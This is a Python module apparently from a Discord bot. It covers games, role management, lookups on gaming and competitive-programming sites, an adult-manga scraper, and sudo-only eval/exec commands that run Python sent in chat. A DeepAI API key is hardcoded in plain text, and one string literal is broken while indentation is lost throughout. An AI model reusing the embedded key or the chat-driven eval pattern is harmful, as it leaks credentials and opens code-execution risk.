@client.command("Anagram Commands", ["anagram", "rm", "?"], "anagram rm <word>", "alias for `anagram remove`")
@client.command("Anagram Commands", ["anagram", "remove", "?"], "anagram remove <word>", "remove a word from the anagram dictionary")
async def command_anagram_remove(command, message):
global words, wordmap
word = command[3].strip().lower()
if word in words:
words.remove(word)
with open("data/words.txt", "w") as f:
f.write("\n".join(words))
key = "".join(sorted(word))
wordmap[key].discard(word)
await send(message, f"Removed '{word}' from the dictionary!")
else:
await send(message, "This word is not in the dictionary!", reaction = "x")
@client.command("Anagram Commands", ["anagram", "lb"], "anagram lb", "alias for `anagram leaderboard`")
@client.command("Anagram Commands", ["anagram", "leaderboard"], "anagram leaderboard", "show the leaderboard for the anagram puzzle")
async def command_anagram_leaderboard(command, message):
scores = []
scoremap = await get_data("leaderboard", "anagram")
for member in message.guild.members:
score = scoremap.get(member.id, 0)
if score:
scores.append((score, member))
scores.sort(reverse = True)
await send(message, embed = discord.Embed(
title = "Leaderboard - Anagram",
description = "\n".join(f"{member.mention} - {score}" for score, member in scores)
))
@client.command("", lambda m: True, "", "")
async def command_anagram_answer(command, message):
try:
await anagram_function(message, answer = message.content.strip().strip("!@#$%^&*()[]{}/|\.,<>\"'").lower())
except:
pass
@client.command("User Commands", ["alias", "?", "?"], "alias <name> <user>", "alias a name to a user")
async def command_alias(command, message):
member = await get_member(message.guild, command[3], message.author)
await set_data("aliases", message.guild.id, command[2].lower(), member.id)
await send(message, f"Aliased '{command[2].lower()}' to {member.mention}!", allowed_mentions = discord.AllowedMentions.none())
@client.command("User Commands", ["unalias", "?"], "unalias <name>", "remove a name's alias")
async def command_unalias(command, message):
await set_data("aliases", message.guild.id, command[2].lower(), None)
await send(message, f"Removed the alias for '{command[2].lower()}'!")
@client.command("User Commands", ["unbonk", "?", "..."], "unbonk <user>", "alias for `unignore`")
@client.command("User Commands", ["unignore", "?", "..."], "unignore <user>", "make the bot no longer ignore messages from a particular user (on a server)")
@client.command("User Commands", ["bonk", "?", "..."], "bonk <user>", "alias for `ignore`")
@client.command("User Commands", ["ignore", "?", "..."], "ignore <user>", "make the bot ignore all messages from a particular user (on a server)")
async def command_ignore(command, message):
for uinfo in command[2:]:
member = await get_member(message.guild, uinfo, message.author)
if not command[1].startswith("un") and member == message.author:
await send(message, f"You cannot {command[1]} yourself!", reaction = "x")
else:
await set_data("ignore", message.guild.id, member.id, not command[1].startswith("un"))
await send(message, f"No longer ignoring {member.mention}!" if command[1].startswith("un") else f"{'Bonk! ' * (command[1] == 'bonk')}Now ignoring {member.mention}!", allowed_mentions = discord.AllowedMentions.none())
@client.command("User Commands", ["unshut", "?", "..."], "unbonk <user>", "alias for `unsilence`")
@client.command("User Commands", ["unsilence", "?", "..."], "unignore <user>", "make the bot delete messages from a particular user (on a server)")
@client.command("User Commands", ["shut", "?", "..."], "bonk <user>", "alias for `silence`")
@client.command("User Commands", ["silence", "?", "..."], "ignore <user>", "make the bot delete messages from a particular user (on a server)")
async def command_silence(command, message):
for uinfo in command[2:]:
member = await get_member(message.guild, uinfo, message.author)
if not command[1].startswith("un") and member == message.author:
await send(message, f"You cannot {command[1]} yourself!", reaction = "x")
else:
await set_data("silence", message.guild.id, member.id, not command[1].startswith("un"))
await send(message, f"No longer silencing {member.mention}!" if command[1].startswith("un") else f"{'https://i.redd.it/l5jmlb1ltqj51.jpg' * (command[1] == 'shut')}Now silencing {member.mention}!", allowed_mentions = discord.AllowedMentions.none())
# @client.command("Role Commands", ["gib", "?", "..."], "gib <name> [roles...]", "alias for `role give`")
# @client.command("Role Commands", ["role", "give", "?", "..."], "role give <name> [roles...]", "give a list of roles to a user")
# async def command_role_give(command, message):
# user, *names = command[2 if command[1] == "gib" else 3:]
# member = await get_member(message.guild, user, message.author)
# roles = [get_role(message.guild, string) for string in names]
# if any(role.id == 741731868692709416 for role in roles) and member.id != 251082987360223233:
# await send(message, f"<@&741731868692709416> is exclusive to <@!251082987360223233>!", allowed_mentions = discord.AllowedMentions.none())
# else:
# await member.add_roles(*roles)
# await send(message, f"Granted {english_list(quote(role.mention for role in roles))} to {member.mention}!", allowed_mentions = discord.AllowedMentions(roles = False))
# @client.command("Role Commands", ["gibnt", "?", "..."], "gibnt <name> [roles...]", "alias for `role remove`")
# @client.command("Role Commands", ["role", "remove", "?", "..."], "role remove <name> [roles...]", "remove a list of roles from a user")
# async def command_role_remove(command, message):
# user, *names = command[2 if command[1] == "gibnt" else 3:]
# member = await get_member(message.guild, user, message.author)
# roles = [get_role(message.guild, string) for string in names]
# await member.remove_roles(*roles)
# await send(message, f"Removed {english_list(quote(role.mention for role in roles))} from {member.mention}!", allowed_mentions = discord.AllowedMentions(roles = False))
@client.command("", ["role", "colour", "?"], "", "")
@client.command("", ["role", "color", "?"], "", "")
@client.command("Role Commands", ["role", "colour", "?", "?"], "role colour <role> [colour = 0]", "alias for `role color`")
@client.command("Role Commands", ["role", "color", "?", "?"], "role color <role> [color = 0]", "recolor a role, or remove its color")
async def command_role_color(command, message):
role = get_role(message.guild, command[3])
await role.edit(color = get_color(command[4] if len(command) > 4 else "0"))
await send(message, f"Recolored '{role.mention}'!", allowed_mentions = discord.AllowedMentions.none())
@client.command("Role Commands", ["role", "rename", "?", "?"], "role rename <role> <name>", "rename a role")
async def command_role_rename(command, message):
role = get_role(message.guild, command[3])
name = role.name
await role.edit(name = command[4])
await send(message, f"Renamed '{name}' to '{command[4]}'!")
services = {
"lol": "lol",
"league": "lol",
"dmoj": "dmoj",
"cf": "cf",
"codeforces": "cf",
"osu": "osu",
"ow": "ow",
"overwatch": "ow"
}
service_list = tuple(services)
@client.command("", [service_list, "link", "?"], "", "")
@client.command("External User Commands", [service_list, "link", "?", "?"], "<lol/league | cf/codeforces | dmoj | osu | ow/overwatch> link [user = me] <account>", "link a user to an external account")
async def command_link(command, message):
service = services[command[1]]
member = await get_member(message.guild, command[3] if len(command) == 5 else "me", message.author)
await set_data("external", service, member.id, command[-1])
await send(message, f"Linked {member.mention} to {command[-1]}!", allowed_mentions = discord.AllowedMentions.none())
@client.command("", [service_list, "unlink"], "", "")
@client.command("External User Commands", [service_list, "unlink", "?"], "<lol/league | cf/codeforces | dmoj | osu | ow/overwatch> unlink [user = me]", "unlink a user from a service")
async def command_link(command, message):
service = services[command[1]]
member = await get_member(message.guild, command[3] if len(command) == 4 else "me", message.author)
await del_data("external", service, member.id)
await send(message, f"Unlinked {member.mention}!", allowed_mentions = discord.AllowedMentions.none())
async def get_ext_user(key, error, command, message):
if len(command) == 3:
if await has_data("external", key, message.author.id):
return await get_data("external", key, message.author.id)
else:
raise BotError(f"You are not linked; please specify {error} or link yourself first!")
else:
try:
member = await get_member(message.guild, command[3], message.author)
if await has_data("external", key, member.id):
return await get_data("external", key, member.id)
except:
pass
return command[3]
@client.command("", [("cf", "codeforces"), ("details", "rank", "rating")], "", "")
@client.command("External User Commands", [("cf", "codeforces"), ("details", "rank", "rating"), "?"], "cf/codeforces <details | rank/rating> [user = me]", "report a codeforces user's public details or just rank+rating")
async def command_cf_details(command, message):
cf = await get_ext_user("cf", "a codeforces user", command, message)
rv = requests.get("https://codeforces.com/api/user.info?handles=" + cf).json()
if rv["status"] == "OK":
cfdata = rv["result"][0]
if command[2] == "rank" or command[2] == "rating":
await send(message, f"{cf} is rank {cfdata['rank']} [{cfdata['rating']}] (max {cfdata['maxRank']} [{cfdata['maxRating']}])!")
else:
embed = discord.Embed(title = cf, color = client.color, url = "https://codeforces.com/profile/" + cf).set_thumbnail(url = "http:" + cfdata["avatar"])
for key, name in [
("email", "Email Address"),
("firstName", "First Name"),
("lastName", "Last Name"),
("organization", "Organization"),
("contribution", "Contribution"),
("friendOfCount", "Friend Of #")
]:
if cfdata.get(key):
embed.add_field(name = name, value = str(cfdata[key]))
if cfdata.get("country") or cfdata.get("city"):
city = f"{cfdata['city']}, " if cfdata.get("city") else ""
embed.add_field(name = "Location", value = f"{city}{cfdata['country']}")
embed.add_field(name = "Current Rank", value = f"{cfdata['rank']} [{cfdata['rating']}]")
embed.add_field(name = "Maximum Rank", value = f"{cfdata['maxRank']} [{cfdata['maxRating']}]")
embed.add_field(name = "Registered Since", value = datetime.datetime.fromtimestamp(cfdata["registrationTimeSeconds"]).strftime("%B %d, %Y at %H:%M:%S"))
embed.add_field(name = "Last Seen Online", value = datetime.datetime.fromtimestamp(cfdata["lastOnlineTimeSeconds"]).strftime("%B %d, %Y at %H:%M:%S"))
await send(message, embed = embed)
else:
await send(message, f"'{cf}' is not a codeforces user!", reaction = "x")
def dmoj_api(URL):
rv = requests.get(URL)
if rv.status_code != 200:
raise BotError(f"'{URL}' returned status {rv.status_code} (not 200)!")
data = rv.json()
if "error" in data:
raise BotError("Error fetching from DMOJ API; likely item does not exist!")
if "data" not in data:
raise BotError("Data not found; check the URL!")
return data["data"]
@client.command("", ["dmoj", ("details", "rank", "rating")], "", "")
@client.command("External User Commands", ["dmoj", ("details", "rank", "rating"), "?"], "dmoj <details | rank/rating> [user = me]", "report a DMOJ user's public details or just rank+rating")
async def command_dmoj_details(command, message):
dm = await get_ext_user("dmoj", "a DMOJ user", command, message)
dmdata = dmoj_api("https://dmoj.ca/api/v2/user/" + dm)["object"]
rating = dmdata["rating"]
if rating < 1000:
rank = "Newbie"
elif rating < 1200:
rank = "Amateur"
elif rating < 1500:
rank = "Expert"
elif rating < 1800:
rank = "Candidate Master"
elif rating < 2200:
rank = "Master"
elif rating < 3000:
rank = "Grandmaster"
else:
rank = "Target"
if dmdata["rank"] == "admin":
rank += " (Admin)"
if command[2] == "rank" or command[2] == "rating":
await send(message, f"{dmdata['username']} is rank {rank} [{rating}]!")
elif command[2] == "details":
await send(message, embed = discord.Embed(
title = dmdata["username"],
color = 0x3333AA,
url = "https://dmoj.ca/user/" + dmdata["username"]
).add_field(
name = "Points",
value = "%.2f" % dmdata["points"]
).add_field(
name = "Solved Problems",
value = str(dmdata["problem_count"])
).add_field(
name = "Contests",
value = str(len(dmdata["contests"]))
).add_field(
name = "Organizations",
value = ", ".join(org["short_name"] for org in dmoj_api("https://dmoj.ca/api/v2/organizations")["objects"] if org["id"] in dmdata["organizations"])
).add_field(
name = "Rank",
value = rank
).add_field(
name = "Rating",
value = str(rating)
))
@client.command("", ["osu", ("details", "summary")], "", "")
@client.command("External User Commands", ["osu", ("details", "summary"), "?"], "osu <details | summary> [player = me]", "report an osu player's public details or summary")
async def command_osu_details(command, message):
osu = await get_ext_user("osu", "an osu! player", command, message)
rv = requests.get(f"https://osu.ppy.sh/api/get_user?k={config['api-keys']['osu']}&u={osu}")
if rv.status_code == 200:
data = rv.json()
if data == []:
await send(message, "Could not find an osu! player by that username/ID!", reaction = "x")
else:
user = data[0]
if command[2] == "summary":
await send(message, embed = discord.Embed(title = f"osu! player details: {user['username']}", description = f"Level {user['level']}\nPP: {user['pp_raw']}\nRank: #{user['pp_rank']} (#{user['pp_country_rank']})\nAccuracy: {user['accuracy']}", color = client.color).set_thumbnail(url = f"http://s.ppy.sh/a/{user['user_id']}"))
else:
seconds = int(user["total_seconds_played"])
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
await send(message, embed = discord.Embed(
title = f"osu! player summary: {user['username']} #{user['user_id']}",
description = f"User since {user['join_date']}",
url = f"https://osu.ppy.sh/users/{user['user_id']}",
color = client.color
).add_field(
name = "Level",
value = user["level"]
).add_field(
name = "Accuracy",
value = user["accuracy"]
).add_field(
name = "Performance Points",
value = user["pp_raw"]
).add_field(
name = "Rank",
value = f"#{user['pp_rank']} (#{user['pp_country_rank']} in {pycountry.countries.get(alpha_2 = user['country']).name})"
).add_field(
name = "Score Counts",
value = " ".join(f"{user['count' + x]} {emoji('osu_' + x)}" for x in ["300", "100", "50"]),
inline = False
).add_field(
name = "Rating Counts",
value = " ".join(f"{user['count_rank_' + x.lower()]} {emoji('osu_' + x)}" for x in ["SSH", "SS", "SH", "S", "A"]),
inline = False
).add_field(
name = "Best Score",
value = user['ranked_score']
).add_field(
name = "Total Score",
value = user['total_score']
).add_field(
name = "Time Played",
value = f"{hours}:{str(minutes).zfill(2)}:{str(seconds).zfill(2)}"
).set_thumbnail(
url = f"http://s.ppy.sh/a/{user['user_id']}"
))
else:
await send(message, f"Failed to fetch from osu! API: status code {rv.status_code}!", reaction = "x")
def display_ow_rank(rating):
try:
rank = int(rating)
if rank < 1500:
e = "ow_bronze"
elif rank < 2000:
e = "ow_silver"
elif rank < 2500:
e = "ow_gold"
elif rank < 3000:
e = "ow_platinum"
elif rank < 3500:
e = "ow_diamond"
elif rank < 4000:
e = "ow_master"
else:
e = "ow_grandmaster"
return f"{rating} {emoji(e)}"
except:
return rating
@client.command("", [("ow", "overwatch"), "summary"], "", "")
@client.command("External User Commands", [("ow", "overwatch"), "summary", "?"], "ow/overwatch summary <player = me>", "report an overwatch player's summary")
async def command_ow_summary(command, message):
ow = await get_ext_user("ow", "a Blizzard battletag", command, message)
try:
r = requests.get(f"https://ow-api.com/v1/stats/pc/us/{ow}/profile")
if r.status_code != 200:
raise RuntimeError("Status Code not 200")
data = r.json()
try:
await send(message, embed = discord.Embed(
title = f"Overwatch player summary: {data['name']}",
description = "",
color = client.color
).add_field(
name = "Level",
value = str(data["level"] + 100 * data["prestige"])
).add_field(
name = "Rating",
value = display_ow_rank(data["rating"])
).add_field(
name = "Games Won",
value = str(data["gamesWon"])
).add_field(
name = "Competitive Winrate",
value = "%.2f%%" % (data["competitiveStats"]["games"]["won"] / data["competitiveStats"]["games"]["played"] * 100) if "games" in data["competitiveStats"] else "N/A"
).set_thumbnail(
url = data["icon"]
))
except:
print(traceback.format_exc())
await send(message, "Failed to generate embed!", reaction = "x")
except:
await send(message, f"Failed to fetch user data for `{ow}` from Overwatch API; check the spelling of this battletag (please format as `name-number`)!", reaction = "x")
@client.command("", [("lol", "league"), ("report", "current", "report-player", "current-player")], "", "")
@client.command("League of Legends Commands", [("lol", "league"), ("report", "current", "report-player", "current-player"), "?"], "lol/league <report | current>[-player] [player = me]", "create a game report for the player")
async def command_lol_report(command, message):
sm = await get_ext_user("lol", "a League of Legends summoner", command, message)
try:
summoner = watcher.summoner.by_name(lol_region, sm)
if command[2] == "report" or command[2] == "report-player":
try:
game = watcher.match.matchlist_by_account(lol_region, summoner["accountId"], end_index = 1)["matches"][0]
try:
if command[2] == "report":
await send(message, embed = await lol_game_embed(message.guild, game["gameId"], sm, False), reaction = "check")
elif command[2] == "report-player":
await send(message, embed = await lol_player_embed(message.guild, game["gameId"], sm, False), reaction = "check")
except:
print(traceback.format_exc())
await send(message, "Failed to create embed!", reaction = "x")
except Exception as e:
await send(message, f"Could not find a game for {lol_region.upper()}/{sm}! The summoner may not have played a proper game recently enough.", reaction = "x")
else:
try:
game = watcher.spectator.by_summoner(lol_region, summoner["id"])
try:
if command[2] == "current":
await send(message, embed = await lol_current_embed(message.guild, game, sm))
elif command[2] == "current-player":
await send(message, embed = await lol_current_player_embed(message.guild, game, [sm]))
except:
print(traceback.format_exc())
await send(message, "Failed to create embed!", reaction = "x")
except Exception as e:
await send(message, f"Could not find current game for {lol_region.upper()}/{sm}! The summoner may not be in game.", reaction = "x")
except:
await send(message, f"Could not find summoner {lol_region.upper()}/{sm}! Please check your spelling.", reaction = "x")
@client.command("League of Legends Commands", [("lol", "league"), "rotation"], "lol/league rotation", "check the current free champion rotation")
async def command_lol_rotation(command, message):
champions = [champs[cid] for cid in watcher.champion.rotations(lol_region)["freeChampionIds"]]
champions.sort()
await send(message, f"This week's free rotation is: {english_list(champions)}.")
@client.command("League of Legends Commands", [("lol", "league"), "ranges", "..."], "lol/league ranges <champion> [champion...]", "compare ability ranges for champions")
async def command_lol_ranges(command, message):
champs = set()
for champ in command[3:]:
champ = champ.lower()
if champ not in cmap:
await send(message, f"{champ} is not a recognized champion name or ID!", reaction = "x")
break
champs.add(cmap[champ])
else:
items = []
for champ in champs:
data = requests.get(f"http://ddragon.leagueoflegends.com/cdn/{lol_version}/data/en_US/champion/{champ}.json").json()
items.append((data["data"][champ]["stats"]["attackrange"], data["data"][champ]["name"], "Basic Attack"))
for i, spell in enumerate(data["data"][champ]["spells"]):
ident = data["data"][champ]["name"] + " " + ("QWER"[i] if 0 <= i < 4 else "?")
if len(set(spell["range"])) == 1:
items.append((spell["range"][0], ident, spell["name"]))
else:
clusters = {}
for i, r in enumerate(spell["range"]):
if r not in clusters:
clusters[r] = []
clusters[r].append(i + 1)
for key in clusters:
items.append((key, ident, spell["name"] + " Rank " + "/".join(map(str, clusters[key]))))
items.sort()
stacked = []
for item in items:
if stacked == [] or item[0] != stacked[-1][0]:
stacked.append([item[0], []])
stacked[-1][1].append((item[1], item[2]))
info = "**Range Analysis**\n"
for rng, stack in stacked:
stack = ", ".join(f"{ident} ({name})" for ident, name in stack)
info += f"\n__{rng}__: {stack}"
await send(message, info, reaction = "check")
@client.command("League of Legends Commands", [("lol", "league"), "item", "?", "..."], "lol item <name>", "get details about an item")
async def command_lol_item(command, message):
item = find_item("".join(command[3:]).lower())
await send(message, embed = discord.Embed(
title = f"League of Legends Item: {item['name']} (#{item['id']})",
description = re.sub("(\\() (.)|(.) (\\))", "\\1\\2\\3\\4", re.sub(" +", " ", re.sub("<[^>]+?>", "", re.sub("<br>|<li>", "\n", item["description"])))),
color = client.color,
url = f"https://leagueoflegends.fandom.com/wiki/{item['name'].replace(' ', '_')}"
).add_field(
name = "Build Path",
value = build_path(item["id"]) + ("\n\nBuilds into: " + english_list(lolitems[key]["name"] for key in item.get("into")) if item.get("into") else "")
).add_field(
name = "Tags",
value = "\n".join("- " + {
"CriticalStrike": "Critical Strike",
"NonbootsMovement": "Movement Speed",
"SpellDamage": "Ability Power",
"MagicPenetration": "Magic Penetration",
"ArmorPenetration": "Armor Penetration",
"SpellBlock": "Magic Resistance",
"Slow": "Movement Reduction",
"Jungle": "Jungling",
"Health": "Health",
"Lane": "Laning",
"Aura": "Aura",
"HealthRegen": "Health Regeneration",
"SpellVamp": "Spell Vamp",
"GoldPer": "Gold Income",
"Mana": "Mana",
"Vision": "Vision",
"LifeSteal": "Physical Vamp",
"Consumable": "Consumable",
"Armor": "Armor",
"Stealth": "Stealth",
"ManaRegen": "Mana Regeneration",
"OnHit": "On-Hit",
"Active": "Active",
"CooldownReduction": "Cooldown Reduction",
"Trinket": "Trinket",
"AttackSpeed": "Attack Speed",
"Boots": "Boots",
"AbilityHaste": "Ability Haste",
"Tenacity": "Tenacity",
"Damage": "Attack Damage"
}[tag] for tag in item["tags"])
).set_thumbnail(
url = f"http://ddragon.leagueoflegends.com/cdn/{lol_version}/img/item/{item['id']}.png"
))
stats_length = 24
async def stats(channel, vis = None):
counts = {}
async for message in channel.history(limit = None):
if not vis or message.author.id in vis:
uinfo = f"{truncate(message.author.name, stats_length - 5)}#{message.author.discriminator}"
counts[uinfo] = counts.get(uinfo, 0) + 1
return sorted(counts.items(), key = lambda a: (-a[1], a[0]))
def truncate(string, length):
if len(string) > length:
return string[:length - 1] + "…"
return string
@client.command("Server Statistics Commands", [("channel", "server"), "stats"], "<channel | server> stats", "output the number of messages sent in each channel by each user")
async def command_channel_stats(command, message):
v = set(m.id for m in message.channel.members)
async with message.channel.typing():
if command[1] == "channel":
s = await stats(message.channel, v)
total = sum(b for _, b in s)
mc = len(str(max(b for _, b in s)))
l = max(len(a) for a, _ in s)
await send(message, embed = discord.Embed(
title = f"Channel Stats for #{message.channel.name}",
description = "```\n" + "\n".join(f"{uinfo.ljust(l)} {str(count).ljust(mc)} ({count / total * 100:.2f}%)" for uinfo, count in s) + "\n```",
color = client.color
))
else:
vis = set(message.channel.members)
counts = {}
ccount = {}
cname = {}
total = 0
failed = 0
for channel in message.guild.channels:
try:
if isinstance(channel, discord.TextChannel):
if set(channel.members) >= vis:
cname[channel.id] = channel.name
for uinfo, count in await stats(channel, v):
counts[uinfo] = counts.get(uinfo, 0) + count
ccount[channel.id] = ccount.get(channel.id, 0) + count
total += count
except:
failed += 1
mc = len(str(max(max(counts.values()), max(ccount.values()))))
ul = max(map(len, counts))
cl = max(map(len, cname.values()))
l = min(max(ul, cl), stats_length)
counts = sorted(counts.items(), key = lambda a: (-a[1], a[0]))
ccount = sorted(ccount.items(), key = lambda a: (-a[1], a[0]))
await send(message, embed = discord.Embed(
title = f"Server Stats for {message.guild.name}",
description = "```\n" + "\n".join(f"{uinfo.ljust(l)} {str(count).ljust(mc)} ({count / total * 100:.2f}%)" for uinfo, count in counts) +
"\n\n" + "\n".join(f"#{truncate(cname[cid].ljust(l - 1), stats_length - 1)} {str(count).ljust(mc)} ({count / total:.2f}%)" for cid, count in ccount) + "\n```",
color = client.color
))
if failed:
await send(message, f"Failed to index the results from {failed} channel{'s' * (failed != 1)}; likely this bot does not have permission to access them.")
@client.command("Miscellaneous Commands", ["blame"], "blame", "blame a random person in this channel (cannot blame any bots)")
async def command_blame(command, message):
members = []
for member in message.channel.members:
if not member.bot:
members.append(member)
await send(message, f"It was {random.choice(members).mention}'s fault!", allowed_mentions = discord.AllowedMentions.none())
@client.command("Miscellaneous Commands", ["spoiler", "image"], "spoiler image", "accept an image in a DM to spoiler (for mobile users)")
async def command_spoiler_image(command, message):
try:
await dm(message.author, f"The next image(s) you DM to me will be sent to {message.guild.name}
await message.delete()
await set_data("dm_spoiler", message.author.id, message.channel.id)
except:
await send(message, "You need to allow me to DM you to use this feature!", reaction = "x")
@client.command("Miscellaneous Commands", ["color", "image"], "color image", "auto-color the next image you send in this channel with DeepAI")
async def command_spoiler_image(command, message):
await send(message, f"The next image you send in this channel will be automatically colored with the power of Artificial Intelligence.")
await set_data("img_color", message.author.id, message.channel.id, 0)
async def nhentai(nhid, force = False):
if force or not await has_data("nhentai", nhid):
response = requests.get(f"https://nhentai.net/g/{nhid}")
if response.status_code == 404:
raise BotError("404 Not Found!")
elif response.status_code == 200:
t = response.text
urls = {x.replace("t.", "i.", 1).replace("t.", ".") for x in re.findall("https://t\\.nhentai\\.net/galleries/\\d+/\\d+t\\.\\w+", t)}
urls = sorted(urls, key = lambda s: [int(x) for x in re.findall("\\d+", s)])
title = re.findall("<span class=\"pretty\">\\s*(.+?)\\s*</span>", t)[0]
subtitle = re.findall("<span class=\"after\">\\s*(.+?)\\s*</span>", t)[0]
sauce = int(re.findall("\\d+", urls[0])[0])
await set_data("nhentai", nhid, (title, subtitle, sauce, urls))
return (title, subtitle, sauce, urls)
else:
raise BotError(f"Unknown error: {response.status_code}")
else:
return await get_data("nhentai", nhid)
@client.command("Genshin Commands", ["genshin", "info", "..."], "genshin info <item>", "get info on an item (must enter the internal ID; ask a developer if unsure but it's not too counterintuitive)")
async def command_genshin_info(command, message):
item = " ".join(command[3:]).lower()
await client.genshin_info(item, message.channel)
await message.add_reaction("✅")
async def resin_set(user, amt):
await set_data("genshin", "resin_info", user.id, time.time() - 8 * 60 * amt)
async def resin_rmd(user):
return await get_data("genshin", "resin_reminder", user.id, default = -1)
async def resin_amount(uid):
if await has_data("genshin", "resin_info", uid):
return min(160, (time.time() - await get_data("genshin", "resin_info", uid)) / 8 / 60)
else:
return -1
def hm(s):
h, m = divmod(int(s // 60), 60)
return str(h) + "h" + str(m).zfill(2) if h else str(m) + "m"
@client.command("Genshin Commands", ["genshin", "resin", "set", "?"], "genshin resin set <amount>", "tell me how much resin you currently have")
async def command_genshin_resin_set(command, message):
amt = int(command[4])
await resin_set(message.author, amt)
cur = await resin_rmd(message.author)
msg = await send(message, "Set your resin!" + ("" if cur == -1 else f" Your existing reminder, set for {cur} resin, will occur in {hm(8 * 60 * (cur - amt))}."))
if message.guild:
await message.delete(delay = 5)
await msg.delete(delay = 5)
@client.command("Genshin Commands", ["genshin", "resin", "now"], "genshin resin now", "check how much resin you currently have")
async def command_genshin_resin_now(command, message):
amt = await resin_amount(message.author.id)
cur = await resin_rmd(message.author)
if amt == -1:
await send(message, "You haven't told me how much resin you have yet!", reaction = "x")
else:
await send(message, f"You currently have {int(amt)} resin!" + ("" if cur == -1 else f" Your reminder, set for {cur} resin, will occur in {hm(8 * 60 * (cur - amt))}."))
@client.command("Genshin Commands", ["genshin", "resin", "reminder"], "genshin resin reminder [[amount] <desired = 160>] / stop", "set / stop a reminder for when you reach a specific amount of resin; your current amount is optional if you've already set your resin amount")
@client.command("", ["genshin", "resin", "reminder", "?"], "", "")
@client.command("", ["genshin", "resin", "reminder", "?", "?"], "", "")
async def command_genshin_resin_reminder(command, message):
if len(command) == 5 and command[4] == "stop":
msg = await send(message, "I will no longer remind you about your resin!")
await del_data("genshin", "resin_reminder", message.author.id)
else:
if len(command) <= 5:
if not await has_data("genshin", "resin_info", message.author.id):
raise BotError("You need to tell me how much resin you have with `genshin resin set` or specify the amount you currently have!")
des = int(command[4]) if len(command) == 5 else 160
amt = await resin_amount(message.author.id)
else:
amt = int(command[4])
await resin_set(message.author, amt)
des = int(command[5])
if des > 160:
raise BotError("You cannot have more than 160 resin without using Fragile Resin to exceed that cap manually!")
if des <= amt:
raise BotError("You already have that much resin!")
cur = await resin_rmd(message.author)
if cur == -1:
msg = await send(message, f"I will remind you when you reach {des} resin (in {hm(8 * 60 * (des - amt))})!")
else:
msg = await send(message, f"You previously had a reminder for when you reached {cur} resin; I will instead remind you when you reach {des} (in {hm(8 * 60 * (des - amt))})!")
await set_data("genshin", "resin_reminder", message.author.id, des)
if message.guild:
await message.delete(delay = 5)
await msg.delete(delay = 5)
@client.command("", [("nhentai", "fnhentai"), "?"], "", "")
async def command_nhentai(command, message):
nhid = int(command[2])
title, subtitle, sauce, urls = await nhentai(nhid, command[1] == "fnhentai")
reply = await send(message, embed = discord.Embed(title = title + " " + subtitle, url = f"https://nhentai.net/g/{nhid}", description = f"Page 1 / {len(urls)}").set_image(url = urls[0]))
await reply.add_reaction("⬅️")
await reply.add_reaction("➡️")
await set_data("nhentai_embed", reply.id, (nhid, 0))
import httpx
import img2pdf, os
from PIL import Image
from PyPDF3 import PdfFileMerger
from io import BytesIO
async def get_async(url):
async with httpx.AsyncClient() as client:
return await client.get(url)
@client.command("", ["nhdownload", "?"], "", "")
async def command_nhdownload(command, message):
async with message.channel.typing():
nhid = int(command[2])
title, subtitle, sauce, urls = await nhentai(nhid, True)
try:
os.mkdir(f"/tmp/{nhid}")
except:
pass
merger = PdfFileMerger()
responses = await asyncio.gather(*map(get_async, urls))
for page, r in enumerate(responses):
pdf_path = f"/tmp/{nhid}/{page}.pdf"
pdf_bytes = img2pdf.convert(r.content)
with open(pdf_path, "wb") as f:
f.write(pdf_bytes)
merger.append(pdf_path)
final_path = f"/tmp/{nhid}/final.pdf"
merger.write(final_path)
merger.close()
try:
with open(final_path, "rb") as f:
await send(message, file = discord.File(fp = f, filename = f"[{nhid}] {title}.pdf"))
except:
await send(message, f"The file is too large to upload; you can access it here: https://dev.hyper-neutrino.xyz/nh/{nhid}")
@client.command("", lambda m: True, "", "")
async def command_image_spoiler_reply(command, message):
if type(message.channel) == discord.DMChannel:
if len(message.attachments) > 0:
if await has_data("dm_spoiler", message.author.id):
await client.get_channel(await get_data("dm_spoiler", message.author.id)).send(files = [(await attachment.to_file(spoiler = True)) for attachment in message.attachments])
await del_data("dm_spoiler", message.author.id)
@client.command("", lambda m: True, "", "")
async def command_image_spoiler_reply(command, message):
if len(message.attachments) > 0:
if await has_data("img_color", message.author.id, message.channel.id):
r = requests.post("https://api.deepai.org/api/colorizer", data = {"image": message.attachments[0].url}, headers = {"api-key": "551549c3-8d2c-426b-ae9f-9211b13e6f14"})
await send(message, r.json()["output_url"])
await del_data("img_color", message.author.id, message.channel.id)
@client.command("", ["echo", "..."], "echo <message>", "echo the message")
async def command_echo(command, message):
await send(message, message.content[message.content.find("echo") + 4:])
@client.command("", ["say", "..."], "say <message>", "echo, then immediately delete the command")
async def command_say(command, message):
await send(message, message.content[message.content.find("say") + 3:])
await message.delete()
@client.command("", ["eval", "?", "..."], "eval <expr>", "evaluate a Python expression in a command function's scope")
async def command_eval(command, message):
if message.author.id not in config["sudo"]:
await send(message, "You must be a sudo user to do that!", reaction = "x")
else:
try:
code = message.content[message.content.find("eval") + 4:].strip()
if code.startswith("```python"):
code = code[9:]
elif code.startswith("```py"):
code = code[5:]
code = code.strip("`")
await send(message, str(eval(code))[:2000])
except:
await send(message, "Error evaluating expression!", reaction = "x")
@client.command("", ["exec", "?", "..."], "exec <code>", "execute Python code in a command function's scope (print is replaced with message output)")
async def command_exec(command, message):
if message.author.id not in config["sudo"]:
await send(message, "You must be a sudo user to do that!", reaction = "x")
else:
try:
code = message.content[message.content.find("exec") + 4:].strip()
if code.startswith("```python"):
code = code[9:]
elif code.startswith("```py"):
code = code[5:]
code = code.strip("`")
output = []
def print(*items, end = "\n", sep = " "):
output.extend(list(sep.join(map(str, items)) + end))
exec(code)
await send(message, "```python\n" + "".join(output[:1980]) + "\n```")
except:
await send(message, "Error executing expression!", reaction = "x")
@client.command("", ["adjust", "ehecd", "?"], "adjust ehecd <x>", "adjust the cooldown of ehe te nandayo")
async def command_exec(command, message):
if message.author.id not in config["sudo"]:
await send(message, "You must be a sudo user to do that!", reaction = "x")
else:
try:
await set_data("ehecd", int(command[3]))
await send(message, f"Cooldown of 'ehe te nandayo' is now {command[3]} second{'s' * (command[3] != '1')}!")
except:
await send(message, "Error; make sure you entered an integer!", reaction = "x")
@client.command("", ["data", "..."], "data", "fetch data from the bot")
async def command_data(command, message):
if message.author.id not in config["sudo"]:
await send(message, "You must be a sudo user to do that!")
else:
await send(message, "```python\n" + str(await get_data(*map(eval, command[2:]), default = None, set_if_missing = False))[:1980] + "\n```")
@client.command("", ["identify", "?"], "identify <user>", "identify a user")
async def command_identify(command, message):
member = await get_member(message.guild, command[2], message.author)
